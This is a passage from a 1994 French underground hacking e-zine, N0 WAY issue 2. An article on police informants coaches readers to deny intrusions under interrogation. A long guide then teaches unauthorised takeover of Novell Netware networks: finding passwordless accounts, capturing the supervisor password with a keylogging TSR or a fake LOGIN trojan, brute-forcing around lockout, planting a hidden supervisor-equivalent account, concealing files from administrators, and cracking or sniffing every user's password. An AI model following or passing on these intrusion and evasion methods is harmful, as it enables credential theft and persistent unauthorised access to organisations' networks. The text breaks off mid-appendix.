-%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.1 27 Juin 1994 \-------------------/ > N0 WAY II < /-------------------\ Nous revoila avec N0 WAY, plus fort que jamais. L'underground francais se cristalise et ca fait bien peur … tous ces empaff‚s comme FT, la DST, Matra, SAT etc... Beaucoups de choses bougent et pas seulement en France, par exemple aux USA avec une totale m‚fiance vis a vis du CERT par exemple qui s'est diffus‚ sur tout le r‚seau Internet. Les Autorit‚s sont de plus en plus prises … la d‚rision et ce n'est pas un mal. Je suis donc trŠs heureux de vous pr‚senter le deuxiŠme num‚ro de N0 WAY. De nouveaux auteurs se sont d‚men‚s pour vous pr‚senter des articles de qualit‚. C'est dans une ambiance bizarre que continuent les scŠnes Am‚ricaines, Anglaises etc... En effet, depuis quelques temps on a appris que de grandes figures de l'underground avaient collabor‚s avec les Secret Services et avaient fait tomber encore plus de personnes. C'est aussi en sachant trŠs bien qu'ils sont monitor‚s que des centaines de hackers & phone phreaks continuent leurs balades nocturnes. En fait on se rend compte que c'est devenu impossible de se cacher totalement des agences en trois lettres. Les lignes sont trac‚es dans tous les pays d‚velopp‚s. Sur les factures des cartes france telecom, il y a mˆme le num‚ro d'appel et le num‚ro appel‚. Les Calling Cards sont toutes monitor‚es par un tracer et quelques phreaks francais on subit les foudres de Sprint, AT&T et France Telecom. Mais de nouveaux horizons montrent bien que le hacking et le phone phreaking ne mourront jamais: La t‚l‚phonie cellulaire du GSM commence … ˆtre analys‚e et diss‚qu‚e montrant des failles assez grosses pour y faire passer un 33 tonnes; Les hackers de l'Internet d‚voilent des failles de conceptions des protocoles TCP/IP avec le Source Routing (aussi appel‚ IP Spoofing); Les hackers en g‚n‚ral ont mis au point des techniques encore plus perfectionn‚es pour faire du TEMPEST pour un bas prix. Bref, tout le monde avance, et pas seulement les V & les PTT. Pour contacter l'‚quipe de N0 WAY, veuillez ‚crire uniquement … la boite aux lettres suivante: NEURALIEN sur RTC ONE au: +33 1 48 70 10 29 (V23) +33 1 48 58 46 17 (V23) +33 1 49 88 76 91 (19200) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Disclaimer: Cette publication ‚lectronique peut contenir des informations, donn‚es et articles interdits dans certains pays. Si les informations de cette publication sont interdites dans un pays, il est du devoir du lecteur de v‚rifier qu'il a bien le droit de poss‚der et de lire (ahahahaha :-) cette publication. Les auteurs et ‚diteurs ne sont en aucun cas responsables d'une mauvaise utilisation des informations publi‚es. Pour les attaques en diffamation et autres conneries bonne pour les censeurs, allez voir qui vous croyez ˆtre l'‚diteur.... Pour la simple et bonne raison que de responsable de la publication et d'‚diteur il n'y en a pas!!! Les informations fournies dans cette publication sont … titre informatifs uniquement. Nous ne vous garantissons rien et si ca vous plait pas allez lire autre chose! Hahahahahahahahahaha... Toutefois, la diffusion et la lecture de ce bulletin PRIVE est restreinte … toutes les personnes dans l'underground informatique. Ne font pas partie de l'underground informatique tel que je le concoit les personnes suivantes: Membres d'‚quipes de s‚curit‚ publiques ou priv‚s, personnes affili‚es … des agences gouvernementales, informateurs quelconques, responsables s‚curit‚s et autres empaff‚s se croyant sup‚rieur de par leur titre. Lire ce bulletin en n'‚tant pas dans l'underground informatique constitue donc une violation des lois de Copyright et de Propri‚t‚ Intellectuelle ainsi qu'un acte de malveillance envers les auteurs et les r‚dacteurs car il revient … lire des informations propri‚taires. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= AprŠs ‡a, c'est pas la DST qui peut nous faire un procŠs pour N0 WAY... "Quoi? Vous avez lu de la documentation propri‚taire et secrŠte alors que vous faites partie d'une agence de s‚curit‚????" -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.2 Table des matiŠres: ~~~~~~~~~~~~~~~~~~ # Titre Auteur Taille 2.1 : Introduction N0 Way Team 4 Ko 2.2 : Table des matiŠres N0 Way Team 1 Ko 2.3 : Echec aux pions NeurAlien 10 Ko 2.4 : The complete Novell Hackers Guide Arscene 40 Ko 2.5 : Telsat 8x50 de Satelcom * NeurAlien 10 Ko 2.6 : Hack'n' phreaking on PBX EasyHacker 35 Ko 2.7 : Cellular Telephone Managing System * NeurAlien 5 Ko 2.8 : VMB's sur Memory Call CrAzY ToNe 14 Ko 2.9 : Unlock the FTH numerical lock * NeurAlien 7 Ko 2.10: International Toll Free Number * NeurAlien 7 Ko 2.11: Telecom Information NeurAlien 8 Ko 2.12: Carte Bancaire VISA D. O'CONNELL 14 Ko 2.13: NUI * NeurAlien 6 Ko 2.14: Comment s'amuser avec un simple telephone NeurAlien 5 Ko Nota: une ‚toile (*) aprŠs le nom de l'article veut dire que cet article a ‚t‚ fait pour CORE DUMP et ressort pour N0 WAY. -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.3 Echec aux pions Vous, membres de la communaut‚ galactique, vous avez d‚ja entendu parler de la toute puissante DST. Cette institution nationale qui sous le couvert du maintien de l'ordre vous espionne nuit et jour. En lisant cet article, vous connaitrez comment la pluspart des informations arrivent aux "grandes oreilles" de l'‚tat. La population de l'underground informatique est tres concern‚e par cette institution. Nous, hackers, phone phreaks et cyberpunks, sommes les aventuriers des nouvelles technologie. Il n'y a plus beaucoup de mondes inconnus et non maitris‚s. L'informatique est l'un de ceux la. C'est pourquoi la DST cherche a controler la FORCE que nous sommes. De nombreux hackers ont ‚t‚ "maitris‚s" par la DST et certains d'entre eux travaillent avec. Leurs m‚thodes sont efficaces (voir autre article de N0 WAY II) mais une de leur plus effroyable tactique se joue sur le plan humain. I. Un peu d'histoire... Une personne que je connais se fit un jour arreter. A 6 heure du matin, il fut r‚veill‚ par une petite ‚quipe d'inspecteurs de la DST pour r‚pondre de certains piratage. Comment l'avaient il trouv‚? Il s'‚tait d'abord jur‚ de ne jamais r‚vŠler son nom ni adresse ni t‚l‚phone … quiconque sur le r‚seau. Puis ayant fait connaissance avec des personnes qu'il consid‚rait comme ses meilleurs amis, il ‚changea son num‚ro de t‚l‚phone avec l'une d'entre elles. FINI ! La rŠgle ‚tait enfreinte, la magie du r‚seau ‚tait bris‚e! Le dernier bastion des contacts anonymes venait de voler en ‚clat. Mais, cela voudrait il dire que la DST ‚coutait toutes les communications informatiques? Non, pas du tout. Il faut savoir que la DST a PEU DE MOYENS FINANCIERS. Ils n'ont pas de fric! Par contre, ils possŠdent des relations en grande quantit‚. La DST par contre a une grande m‚moire. Ils peuvent trŠs bien vous faire avouer votre "m‚fait" informatique en menacant de reveler quelque chose de comprommettant sur vous. (Hehe, faites comme moi: je suis comme je suis et rien a foutre de mon image! C'est exactement le comportement qui les gene: le "Rien a battre !"). C'est comme ca que certainnes personnes deviennent des espions de la DST. La DST leur dit: On vous couvre si il y a un problŠme avec la justice (plaintes etc...) Vous nous donnez en ‚change toutes les donn‚es qui nous interresse sur telle personne ou tel ami. Il est tres facile pour eux de transformer n'importe qui en une taupe. Ils disent: ca vous facilitera la vie plus tard, on se debrouillera pour que vous n'ayez jamais d'ennui. Et telle est la piŠce maitresse de leur jeu, LES TAUPES ! Ce sont les taupes qui permettent … la DST d'attraper des pirates. Les inspecteurs de la DST sont trop cons et pas assez dans le courant pour se faire passer pour des hackers. Ils _utilisent_ donc d'autres pirates qui se seront fait tauper. Ils gardent toujours la trace de plusieurs taupes et des qu'ils ont besoin de l'une d'elle … cause de ses fr‚quentations, la DST va rechercher dans sa "grande m‚moire" la taupe ad‚quate. L… on peut se poser la question: Si c'est la taupe qui fait tomber un mec qui devient une taupe etc... C'est toujours la DST qui est perdante car personne ne sera jamais incuple ni mis hors-service? C'est vrai, ‡a pourrait ˆtre le cas mais ce serait oublier quelque chose: Les enquŠtes se divisent en 2 parties: - enquŠtes de s‚curit‚ (95% des cas) - enquŠtes judiciaires (5% des cas) Les taupes sont TOUJOURS d‚nich‚es lors d'enquŠtes de s‚curit‚, donc si vous recevez la visite d'une ‚quipe de la DST et qu'ils ne vous font pas faire de Garde … vue ni de d‚position ni ne vous pr‚sentent un mandat, il est trŠs possible que dans quelques temps (le d‚lai peut ˆtre de l'ordre du jour ou de l'ann‚e) vous soyez recontact‚ pour avoir des informations, en vous menacant de vous balancer dans les mains d'un juge. G‚n‚ralement, le pion est une personne qui a peu de valeur pour la DST mais qui peut connaitre des personnes beaucoup plus interressantes; Et bien s–r on utilise les taupes lors d'enquŠtes judiciaires car ce sont les seules qui doivent imp‚rativement aboutir. Ainsi la DST dispose dee multiples _pions_ ou taupes dans les diff‚rents milieux tels que celui de l'underground informatique. Ces pions sont facilement manipulables et fournissent tout le temps des informations de qualit‚. Pour entretenir la relation, la DST peut jouer sur deux tableaux: - flatter le pion en lui attribuant un poste, ou meme un grade (c'est purement fictif en fait vu que dans le civil (DST) il n'y a pas de grade). ("flatter le pion" revient … peu pres a lui "l‚cher le fion"... hahaha :)) d‚sol‚, je pouvais pas m'en empŠcher). - faire peur au pion en lui rappelant des faits ou en menacant de d‚voiler des "secrets". Pour cela, ils n'h‚sitent sur rien: sexe, problemes d'argent, vol, relations incestueuses en esperant que la personne soit assez honteuse sur ce sujet pour avoir peur de ces r‚v‚lations. (La bonne parade est de dire par exemple quand on vous montre des photos compromettantes avec comme personnage principal un LIT: "j'en veux 2 de celle ci et 5 de celle la, Bravo pour le tirage, c'est du beau travail" hehehe :)) effet garanti !) Au bout d'un certain temps, un pion peut devenir gˆnant. Il y a des cas comme celui l…: Un jour, un pion est venu me voir et m'a dit qu'il ‚tait dans la merde. Au bout d'un bon quart d'heure, il m'a enfin dit qu'il avait ‚t‚ un pion pour la DST et qu'il avait permi d'inculper un mec qui se servait des Callings Cards pour appeler des amis de certains Cartels (pas plus la dessus). Ce pion en avait appris trop selon la DST et ‚tait devenu gˆnant. La solution qu'ils on trouv‚ … ‚t‚ de l'inculper AVEC le trafiquant en le menacant de r‚v‚ler au trafiquant qu'il avait boss‚ avec eux. Bref, ca voulait dire des chaussures en b‚ton pour visiter le fond le la Loire pour le pion en question. Pas mal non? Le pion a ferm‚ sa gueule et s'en est pris plein la gueule tout en ayant tout le temps collabor‚ avec la DST. Vous comprenez maintenant comment une personne peut ˆtre arrˆt‚e aussi facilement. II. Et c'est pas fini... C'est la mˆme chose dans l'informatique ou dans toutes les professions sensibles, la DST place des pions un peu partout et s'en sert des qu'elle en a besoin. Par exemple, la DST envoie des ‚missaires comme Jean Luc Delacour dans beaucoup d'‚coles pour faire des conf‚rences sur la s‚curit‚. En fait de conf‚rences, ce sont de v‚ritables s‚ances de recrutement. Les ‚coles vis‚es sont les grandes ‚coles, les ‚coles d'ing‚nieurs, les instituts etc... Une fois un pion install‚ dans une entreprise, la DST est s–re de pouvoir tout savoir sur cette soci‚t‚. Rien de plus difficile … detecter qu'une personne qui joue double jeu. En effet, juste un coup de t‚l‚phone suffit … une taupe pour informer la DST de telle ou telle chose. Les pions dans ce cas l… sont toujours trait‚es avec respect mais ca leur attire en g‚n‚ral de gros ennuis quand la DST leur demande de faire quelque chose contre la soci‚t‚ ou ils travaillent. III. Comment se pr‚munir de ces morpions? Eh bien le meilleur moyen de se pr‚munir contre les morpions est de ne pas pouvoir en devenir un sois mˆme. C'est plut“t d‚gradant de faire ce genre de boulot et j'ai jamais rencontr‚ quelqu'un ayant fait ca qui soit fier de lui. Je le comprends totalement car il n'y a pas grand chose de plus d‚sagr‚able que de trahir ses amis. Il ne faut pas se sentir vuln‚rable sur quelque chose. Leur but est de vous montrer que vous ˆtes faibles pour vous transformer en un outil qui leur sera pratique. Prot‚gez vos amis, ne devenez pas un pion... ...retrouvez vos amis, cessez d'ˆtre un pion Pour cesser d'ˆtre un pion, ca peut ˆtre plus facile qu'on ne le pense. D‚ja, il faut savoir que le seul truc qui peut vous faire r‚ellement tomber pour du piratage informatique ou du phreaking est l'aveu. Si vous avez avou‚, RIEN NE SERT D'AIDER LA DST, ils ne renvoient JAMAIS l'ascenseur. ^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^ Si vous n'avez pas avou‚ et qu'ils ont des cahiers/feuilles/disques/HD montrant des intrusions ou des codes & mots de passes, ils ne peuvent rien en faire si vous savez quoi r‚pondre. Ex: DST: Ces codes sont ‚crits de votre main, oui? Vous: c'est Vrai. D: Donc vous avez accŠd‚ … ces codes? V: Non, jamais. D: Vous les avez au moins essay‚ non? V: Non, c'‚tait juste marrant de les avoirs, ce qu'il y a aprŠs ne m'interresse pas. D: Vous vous foutez de ma gueule ou quoi? V: Voyons monsieur l'inspecteur, je n'oserai pas! D: Mais vous aviez la possibilit‚ de rentrer sur ces machines? V: Oui. D: Donc vous venez de dire que les codes sont bons, vous ˆtes donc rentr‚s sur cette machine!!!?! V: NON. { c'est a ce genre question qu'il faut r‚pondre toujours et invariablement NON } Si vous avouez, ce N'EST PAS GRAVE _TANT_ que vous ne signez pas la d‚position, une fois la d‚position sign‚e il n'y a plus rien … faire. Une d‚position non sign‚e ne vaut rien. Ne vous faites pas duper, NE SIGNEZ JAMAIS RIEN sans bien v‚rifier que le document ne vous engage pas sur un aveu! - - - - Voila, j'espere que vous saurez tirer les lecons et les conclusions qui s'imposent de cet article. Noous sommes les alli‚s du 21Šme siŠcle, ne nous laissons pas envahir par les collabos des r‚seaux ;) ++NeurAlien. Greetings to: Locksmith, Holz, Arscene, Coaxial Brain, Kom Breaker, Easy Hacker, Crazy Tone, Barkipper2, Fortan, O'Connell, Spy Hunter, FCS, Gandalf, Powahh et tous les autres hackers et phones phreakz de France et du monde. -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.4 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º The Complete Novell Hackers guide º º º º --== By ARSCENE ==-- º º º º For No Way º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ I) Introduction ~~~~~~~~~~~~~~~ Cet article va vous apprendre comment fonctionne la securit‚ dans un reseau Novell Netware (L'info devrait etre valable pour tous les reseaux Novell Netware et meme d'autres reseau (pour les grands principes) mais les details sont ceux du Novell Netware 3.11 ou 386). Le fil directeur sera un 'How to hack' etape par etape avec des divergences quand cela s'impose. Il part du niveau debutant/moyen pour arriver a un niveau ou (j'espere) meme les gurus Novell y trouverons quelque chose de nouveau. Novell est le plus grand vendeur de reseau LAN au monde; il parait qu'il y a plus d'ordinateurs en reseau Novell que sur tout Internet. Vous trouverez ce type de reseau dans beaucoup de moyennes et grandes entreprises, dans des colleges/lyc‚es et meme certaines facs. II) Gaining access ~~~~~~~~~~~~~~~~~~ La premiere chose a faire est de se trouver un compte, n'importe lequel, sur le reseau. Verifiez tout d'abord que les gestionnaires du reseau sont install‚s. Il y en a deux: IPX (La couche de base) et NETX ( Le API de Novell), mais ils peuvent avoir des noms un peu differents. Ils sont souvent lanc‚s par le autoexec.bat ou se trouvent dans un repertoire du genre 'Netware' ou 'reseau' ou un truc comme ‡a. Maintenant allez sur le drive reseau (F, G, ...). Vous le reconnaitrez car le seul repertoire accessible s'appelle LOGIN. La tapez SLIST. Voici la liste des serveurs disponibles (capturez cela par un 'SLIST > c:\test.txt'). Le serveur avec [default] … cot‚ est celui le plus proche de vous par les cables du reseau. Commen‡ons par la. Il faut maintenant se logger. Tapez LOGIN. III) Trouvez un premier compte ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Notre but est de trouver un compte qui n'a pas de password. Par default SUPERVISOR et GUEST n'en ont pas (Il est egalement bon de savoir que ces comptes existent toujours car meme l'admin ne peut les effa‡er). Normalement GUEST doit fonctionner. Si le reseau est cens‚ etre en libre access (lyc‚e, fac, biblioth‚que, ...) il y aura souvent des BAT dans C:\ qui lancent certaines taches sur le reseau. Cherchez y des lignes du type LOGIN . Essayez aussi des trucs du genre TAPE, BACKUP, SERVER, REMOTE, CONNECT, NOVELL, etc... Si vous voyez qu'un compte lance un BAT (c'est souvent le cas des backups) essayez CTRL-C pour le quitter et vous serez libre. Si vous n'avez toujours pas de compte il est temps d'utiliser vos talents de social engineering, preferablement sur des users, pas l'admin. IV) L'environnement Netware et les scripts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A) L'environnement Netware: La premiŠre partie est traduite directement d'un article de The Butler parut dans Phrack 35 car cette partie de son article etait trŠs bien: Le directory SYS:SYSTEM est utilis‚ pour l'administration du systŠme et contient les fichiers de l'OS netware et des progs … l'usage exclusif du supervisor. Le directory SYS:PUBLIC est ouvert … tous et contient des outils divers (dont j'en presenterait quelques un plus loin). Le directory SYS:LOGIN contient, comme son nom l'indique, quelques progs pour se logger. Le directory SYS:MAIL est utlis‚ par des progs de mail ecrits pour Netware. Ce directory a aussi un sous-dir du nom du ID number pour chaque utilisateur qui contient son script de login et des configs pour l'imprimante (Les dirs des users autres que vous ne sont visibles que pour le supervisor). B) Les scripts de login La suite est egalement traduite du meme article de The Butler de Phrack (La traduction n'est pas telle quelle, je resume souvent): Le script de login est execut‚ chaque fois que vous vous loggez et il prepare l'environnement pour vous. Il map des drives/directory du reseau pour que vous pouvez y acceder, il peut vous logger sur d'autres serveurs et executer des progs. Pour editer votre script une fois logg‚ lancez SYSCON, allez sur 'User Information', sur votre nom, puis sur 'Login Script'. Editez votre script puis quittez par et confirmez. Pour que votre script s'execute vous devez faire Logout et a nouveau vous logger. Voici les commandes principales des script, une petite description (en Anglais, j'en ais mare de traduire) et un example: MAP INS16:= Inserts the drive as the next available search drive. MAP INS16:=pd3\sys:jan MAP drive:= Maps the specified drive to the given directory. MAP G:=pd3\sys:home\jan MAP *n:= Maps the next available drive to the given directory. MAP *1:=pd3\sys:home\jan # Runs an executable file (a file with an .EXE or .COM extension). #SYSCON REMARK These three commands allow you to insert explanatory text in * the login script. They will not appear on your screen. ; REMARK Be sure to update the PROJECTS file. * Check for new mail. ; Assign OS-dependent Search mappings. ATTACH Allows you to attach to other file servers while remaining logged in to your current file server. ATTACH pd3\jan SET Allows you to set DOS variables. SET wp="/u-jlw/" SET usr="jwilson" IF...THEN Executes certain commands, if a specified condition exists. IF DAY_OF_WEEK="Monday" THEN WRITE "AARGH..." Si quelque chose n'est pas clair essayez differentes maniŠres et consultez le HELP qui est trŠs explicite sur les scripts. Pour voir ce que vous avez Mapp‚ tapez: MAP. Vous pouvez egalement rajouter des map avec cet outil. Examples: MAP J:= path MAP J:= COUNT/SYS:HOME/MARIA MAP S3:=COUNT/ACCT:ACCREC V) Les utilitaires et tous les autres comptes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vous voici donc sur le reseau. Allez dans le root (disons que c'est le drive F). Si vous y voyez un directory SYSTEM et 2 fichiers .ERR alors votre compte a le niveau SUPERVISOR. Congratulez vous d'avoir un admin si stupide. (Normalement votre access ne sera que trŠs limit‚). Allez dans le repertoire PUBLIC. Je vais vous presenter quelques utilitaires interressants: - USERLIST : Donne la liste des utilisateurs actuels du reseau. TrŠs utile pour voir si le supervisor est connect‚. Le compte avec un '*' a cot‚ c'est vous. Capturez la sortie: 'USERLIST > c:\test2.txt'. Voici de nouveaux comptes … essayer. - RIGHTS : Affiche vos droits dans le directory actuel. Si vous avez 'S' votre compte est supervisor. 'A' c'est Access control, aussi assez interressant. 'W' est Write et peut vous permettre de faire transiter des fichiers a vous par le serveur (Par exemple pour y acceder a partir d'un ordinateur ou les floppy drives sont inaccessibles). Utilisez des noms judicieux pour bien dissimuler vos fichiers: MENU.OLD, ~TFG245.TMP, etc. Si vous trouvez une suite de fichiers du genre FIC1.EXT, FIC2.EXT, FIC3.EXT, etc alors appelez les votre FIC4.EXT et ainsi de suite. Le truc est que l'admin ne les remarque pas. Aussi evitez de changer leur ATTRIB car cela ne les rendra que plus visibles. - SEND : Vous permet d'envoyer des messages … un autre connect‚. Syntaxe: SEND "Message bla bla" TO . Notez que _tous_ les gens connect‚s sous le nom re‡oivent vos messages donc verifiez que votre destinataire est seul. Evitez de trop utiliser cet outil car il est lourd (il y a des CHAT en free/shareware beaucoup mieux) et a une facheuse tendance a reveiller l'admin. Un user peut bloquer/debloquer des messages (empecher qu'on ne lui envoit des messages) avec CASTOFF/CASTON - HELP : Comme son nom l'indique. Utilisez le … fond pour bien connaitre Novell, il est trŠs bien fait. Vous pouvez egalement l'emporter chez vous en copiant les fichiers: 'NFOLIO.*' et '*.NFO'. - SYSCON : Le meilleur outil de tous. Vous allez etre amener a trŠs bien le connaitre. Avant de le lancer executer un prog du type ScrollIt (shareware) qui permet de capturer l'ecran et de la sauvegarder dans un fichier. AprŠs avoir lan‡‚ SYSCON allez sur l'option 'User Information' et, abracadabra, voi‡i la liste de _tous_ les comptes possibles sur ce serveur. Utilisez maintenant ScrollIt pour sauvez cette liste dans c:\TEST3.TXT (Si la liste est plus longue qu'un ecran il faudra vous y prendre a plusieures fois). Cet outil vous permet de voir le niveau securit‚ du compte que vous utilisez (allez sur son nom et faites Enter) ainsi que toutes les restrictions horaires, de stations, de place disque, etc. C'est egalement cet outil que vous utiliserez une fois logg‚ en supervisor (cf plus bas). - SESSION : Un genre de super USERLIST. Explorez le mais il n'est pas d'une grande utilit‚. - SETPASS : Permet de changer le PW du compte dans lequel vous etes logg‚. Pour l'utiliser il faut connaitre l'ancien PW. Cet outil sert beaucoup pour tester un hack: Vous changez le PW d'un compte qui n'a pas de PW en 'abc', et vous essayez votre hack dessus pour voire s'il le trouve. Si oui alors il devrait fonctionner sur d'autres comptes, si non votre hack n'est pas bon. Quand vous avez fini (evitez de prendre trop longtemps en cas ou quelqu'un d'autre essaye de se logger) vous remetez le PW a rien (tapez pour nouveau PW). VI) Supervisor access ~~~~~~~~~~~~~~~~~~~~~ Il nous faut maintenant trouver le PW du supervisor. Il y a 4 fa‡ons de faire ceci: A) Par Social Engineering ou en utilisant des competences non li‚es … l'informatique. Ceci n'est pas du ressort de cet article. B) La meilleure fa‡on: Pour ceci il faut avoir access physique … un poste ou se log le supervisor. Il faut y installer un TSR qui va capturer son PW lorsque il se log. Il y a en gros 2 fa‡ons de faire ceci: * D‚tourner la fonction de Int 21h 'load & execute' et verifier si on essaye d'executer LOGIN. On detourne alors Int 9h (Clavier) et on capture tout jusqu'… la fin de LOGIN (Int 20h, je pense, qui est terminaison de programme). Cette technique est employ‚ par un superbe programme du nom de GETIT ou THIEFNOV que l'on peut trouver sur certains BBS. * D‚tourner la propre interruption de login de l'API Novell. Pour cela il faut que le TSR soit lan‡‚ _aprŠs_ NETX. Je pense que avec des techinques employ‚s par des virus on pourrait infecter NETX (NETX.COM ne fait pas de check d'integrit‚) avec le TSR de sorte que tout se passe de fa‡on transparente, mais cela reste … etudier. Pour plus d'infos sur les Int de l'API Novell je recommande Ralph Browns Interrupt List (freeware). De la on voit que les 2 Int les plus interressants sont: - Int 21h, AH=E3h, subfunction 14h (Login to file server) - Int 21h, AH=F2h, AL=17h, subfunction 18h (Login encrypted) Le premier est trŠs bien decrit, mais malheureusement je pense que ce soit le second le plus utilis‚. Pour voir lequel est utilis‚ ecrivez un petit prog pour generer l'int, ou vous pouvez essayer INT.COM qui vient avec la Interrupt List. Si le serveur vous repond un truc du genre 'Attempt to send unencrypted password over the network' alors il vous faut le second. Le problŠme ici est que le second Int envoit le PW crypt‚, ce qui ne nous est pas trŠs utile car le chiffrement du PW depend d'une cl‚ descern‚ par le serveur. Voyez Appendix C pour une description de comment Novell crypte les PW. Le code en Appendix B devrait aussi etre trŠs utile. De toute fa‡on, cela fait que la premiŠre approche (rediriger l'Int du clavier) est nettement meilleure si vos PW sont envoy‚s crypt‚s. C) La plus longue fa‡on mais aussi la plus sure: Essayer toutes (ou presque) les combinaisons possibles. Cela se fait en utilisant la technique du demon dialing (comme dans un wardialer). Vous pouvez soit essayer toutes les combinaisons possibles (aaa, aab, ... zzzzzz,etc) ou alors faire un dictionary attack, c'est a dire essayez tous les mots d'un dictionnaire que vous prevoyez. La premiŠre methode est sure de trouver le PW eventuellement, mais la seconde est beaucoup plus rapide. Ensuite, il y a 2 fa‡ons d'essayer les PW: * En login: Cette maniŠre consiste tout simplement a essayer de se logger avec tous les PW jusqu'a trouver le bon. Il y a un freeware qui fait cela avec LOGIN.EXE, mais il est trŠs lent et je ne suit pas 100% sur qu'il fonctionne, donc je ne le conseille pas. Il vaut mieux ecrire son propre prog. Les Int qui nous interressent (encore du Interrupt List) sont ceux list‚s en B), et celui … utiliser depands si les PW doivent etre crypt‚s ou pas. Cela semble bien, mais il y a un hic: Intruder Detection/Lockout. Si l'admin a activ‚ cette option au bout de X echecs au login le compte sera desactiv‚ jusqu'a ce que l'admin le reset. Donc avant d'essayer cette methode il vaut mieux tenter un dixaine de login avec un account, si vous pouvez en essayer beaucoup alors Intruder Detection/Lockout n'est pas actif. Pour essayer choisissez plustot un compte assez faible, celui d'une secretaire pas trop dou‚ ou un compte ou il y a souvent pas mal de personnes loggez en meme temps. * En verify password: Le principe est le meme mais au lieu d'essayer de se logger on utilise un int qui nous permet de verifier si le PW est bon. Cela a un double avantage: Plus rapide que Login et pas d'Intruder Detection/Lockout. Les deux Int sont: - Int 21h AH=E3h sub 3Fh Verify bindery object PW - Int 21h AH=F2h AL=17h sub 4ah Verify bindery object PW encrypted Ici encore, c'est a vous de determiner le quel est le bon pour vous. Si vous pouvez utiliser le premier je vous conseille l'utilitaire NETCRACK qui essaye tous les PW possible sur un compte (avant de l'utiliser editez le pour enlever le texte qu'il affiche). Si vous essayez NETCRACK sur un serveur ou les PW doivent etre crypt‚s il marchera quand meme mais il envoit un message a tous les supervisor logg‚s, au serveur et … vous meme et emet un bip. Le message est … peu prŠs: 'Attempt to send unencrypted PW over the network'. D) Le LOGIN trojan. Si un poste se log automatiquement par le AUTOEXEC.BAT vous pouvez ecrire un trojan LOGIN.COM qui fait: - Demande le nom si celui si n'a pas ‚t‚ specifi‚ sur la ligne de commande. - Demande le PW. - Genere un ecran d'erreure _identique_ a celui du vrai LOGIN pour faire croire que le user a mal tap‚ son PW. - Sauve le serveur, le nom, le PW, l'heure et la date dans un fichier local cach‚. - Va dans le directory F:\LOGIN (ou selon) ou se trouve le vrai LOGIN et quitte. Le user va r‚essayer de se logger. La le vrai LOGIN s'executera et il ne va s'apercevoir de rien. Une option ici serait de sauvegarder le AUTOEXEC.BAT a l'installation et quand le trojan a captur‚ le PW du SUPERVISOR il s'efface lui-meme et restaure le AUTOEXEC.BAT d'origine. Si vous laissez un fichier (LOGIN.COM) sur le disque je vous recommande vivement de l'editer pour enlever tout le texte qui s'y trouve et de le crypter avec TINYPROG (shareware) pour eviter que l'on ne decouvre qui l'a ecrit. VII) L'aprŠs SUPERVISOR et les autres comptes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A) Votre compte a vous: Vous avez le PW du SUPERVISOR. Toutefois evitez de vous servir de ce compte car l'admin le remarquera. Choisissez un compte qui sert peu ou qui n'a pas servi depuis longtemps, un compte dont vous connaissez le PW est le mieux mais un compte sans PW est bon aussi. Vous allez maintenant donner … ce compte le SUPERVISOR equivalence (en faire un autre Supervisor): - Loggez vous sur un compte bidon et verifiez (USERLIST) que personne de trop important n'est present. Faites Logout. - Loggez vous en SUPERVISOR et lancez SYSCON - Ignorez les 'Supervisor utilities' et allez dans 'User Information' - Selectionnez le compte que vous avez choisis et faites Enter - Allez sur 'Security Equivalences' et faites Enter - Faites et selectionnez SUPERVISOR dans la liste et Enter. - Confirmez si on vous le demande et quittez par des repetitifs. Voila, bravo, vous avez votre compte Supervisor. B) Tous les autres PW: *** Moi, l'auteur, ait verifi‚ que tout ce qui precede est correct *** et marche. Je n'ais pas encore essay‚ la suite et ne peut donc *** pas garantir son efficacit‚. Je ne tarderait pas bien sur a *** essayer. Maintenant vous desirez surement prendre les PW de tous les autres user. Vous pouvez proceder comme pour le compte SUPERVISOR, mais il y a des moyens beaucoup plus rapides: * Tous les PW sont crypt‚s et sauvegard‚s dans les Bindery file. Procurez vous un utilitaire pour Dump la Bindery et emmenez la chez vous. Vous allez maintenant faire une operation chŠre aux UNIX-hackers: Un autre brute-force attack. L'appendix B contient un prog C avec l'algo de cryptage qu'utilise Novell. Il vous reste a faire un dictionnary attack en cryptant vos mots et en les comparant … ceux du bindery pour chaque user. Cela ne devrait pas prendre trop longtemps et il n'y a pas de probl‚me car vous etes chez vous, ou l'admin ne peut vous voire. * La deuxiŠme tactique est le packet-sniffing. Si votre reseau utilise des PW crypt‚s loggez vous au niveau SUPERVISOR (console) et tapez: Set Allow Unencrypted Passwords=ON Les PW passeront dans le reseau non-crypt‚s. Il vous suffit de lancer IPX.COM (Vous n'avez meme pas besoin d'etre logg‚) et un programme qui capture tous les packets qui passent sur le reseau. De cette maniŠre vous pourrez meme lire le mail, les messages par SEND et tout ce qui transite pas le reseau. Cette partie doit vous sembler trŠs floue. C'est normal car je n'ais put l'essayer pour l'instant. Appendix A: Notes en vrac et obtenir plus d'infos: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Pour les PW le case n'est pas important: 'X' et 'x' sont pareils. Les PW peuvent aussi contenir des numeros et ils peuvent faire jusqu'… 20 charachters. Dans le root il y a 2 fichiers .ERR (Qui ne nous sont pas d'une grande 